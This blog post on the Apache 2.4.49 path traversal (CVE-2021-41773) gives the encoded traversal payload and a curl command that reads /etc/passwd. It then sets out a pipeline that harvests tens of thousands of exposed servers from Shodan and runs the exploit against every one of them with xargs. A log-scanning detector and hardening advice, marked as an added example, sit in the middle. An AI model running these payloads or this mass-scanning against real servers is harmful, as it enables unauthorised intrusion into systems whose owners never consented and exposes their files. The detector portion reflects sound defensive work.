Finding and Exploiting Path Traversal in Apache 2.4.49 HTTP Server [CVE-2021-41773]

On October 4th, Apache disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, tracked as CVE-2021-41773. At the same time Apache released a patch for this vulnerability in its new version, 2.4.50. The vulnerability allows an attacker to bypass the path traversal protection using URL encoding. The bypass looks something like this.

.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
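
The bypass works because the 2.4.49 path normalization did not treat a percent-encoded dot (%2e) as a dot, so the traversal check passed and the decoded path was served afterwards. A defender reading access logs therefore has to decode the request target first and only then look for dot segments that climb above the document root. The following detector is an added example and not code from the original post; the access-log lines it scans are constructed, and the field names in the returned records are my own choice.

```python
"""Flag encoded path-traversal requests (the CVE-2021-41773 pattern) in Apache
access logs. Added example, not from the original post; the log lines below are
constructed for the demonstration."""
import re
from urllib.parse import unquote

# Apache "common"/"combined" format: client IP first, the request line in the first
# pair of double quotes, then the status code. Only the prefix is matched.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Constructed sample lines: one encoded traversal that was served, one normal
# request, one harmless '..' that stays inside the root, one double-encoded
# attempt that the server rejected with 400.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1234 "-" "curl/7.68.0"',
    '198.51.100.7 - - [05/Oct/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Oct/2021:10:00:03 +0000] "GET /icons/../index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Oct/2021:10:00:04 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 400 226 "-" "curl/7.68.0"',
]


def decode_fully(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so both .%2e and the
    double-encoded %252e collapse to a plain dot."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(path: str) -> bool:
    """Walk the decoded path segment by segment and report whether a '..'
    ever climbs above the document root (depth below zero)."""
    depth = 0
    for segment in path.split("?", 1)[0].split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_log(lines):
    """Return one record per traversal attempt. 'served' is True when the
    server answered 2xx, i.e. the request most likely succeeded; a patched
    server rejects these requests instead."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        decoded = decode_fully(target)
        if not escapes_root(decoded):
            continue
        status = int(m.group("status"))
        hits.append({
            "ip": m.group("ip"),
            "target": target,
            "decoded": decoded,
            "status": status,
            "served": 200 <= status < 300,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Note that /icons/../index.html is deliberately not flagged: the dot segment resolves to a path that is still inside the root, which is how a real traversal differs from sloppy but harmless links. A hit with `served` set is the record to act on first, since it means the server actually returned the file. Besides upgrading, the Apache advisory pointed out that the requests only succeed where the filesystem root is not protected by the default `<Directory />` block with `Require all denied`, so that block is worth verifying in httpd.conf on any server you cannot patch immediately.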

It is also possible to achieve RCE (remote code execution) if mod_cgi is enabled. Modern web technology no longer uses it, but older websites built on old technology still rely on this functionality. The exploitation process is easy and can be performed with curl. Let's see how we can find websites running this Apache version. We will use our favourite search engine, shodan.io. Using this simple query we can find potentially vulnerable Apache 2.4.49 HTTP servers.

"Apache/2.4.49"

We got 78,219 results. Those servers run Apache 2.4.49, but not all of them are vulnerable, so we need to filter out the vulnerable ones. We can do that with bash, so let's combine our script with the exploit. The exploit with curl looks like this.

curl --silent --path-as-is --insecure -k "target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

This only exploits the server and shows us the contents of /etc/passwd. Let's create a detection script around it.

Now let's download the results from Shodan. But our script takes one argument at a time, so how can we feed it multiple inputs?

We can extract the IP addresses from the downloaded result using a regex.

cat aa4dfdb4-faba-43a1-8784-9cce0c8f46e9.json | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'| tee -a ip.txt

We have stored all the IPs in ip.txt; now let's scan them for the vulnerability using our bash script and xargs.

cat ip.txt | xargs -n1 -P10 bash poc.sh | tee -a results.txt

We can use httprobe to detect whether the target uses HTTP or HTTPS.

Bug hunters can use the same process with all the subdomains they have collected.

cat subdomains.txt | httprobe | xargs -n1 -P10 bash poc.sh | tee -a result.txt

[This article is for educational and research purposes only; we do not encourage harming others' property without permission.]

Joy Ghosh

Security Researcher | CTF Player | Web-Application Pen-tester | Programmer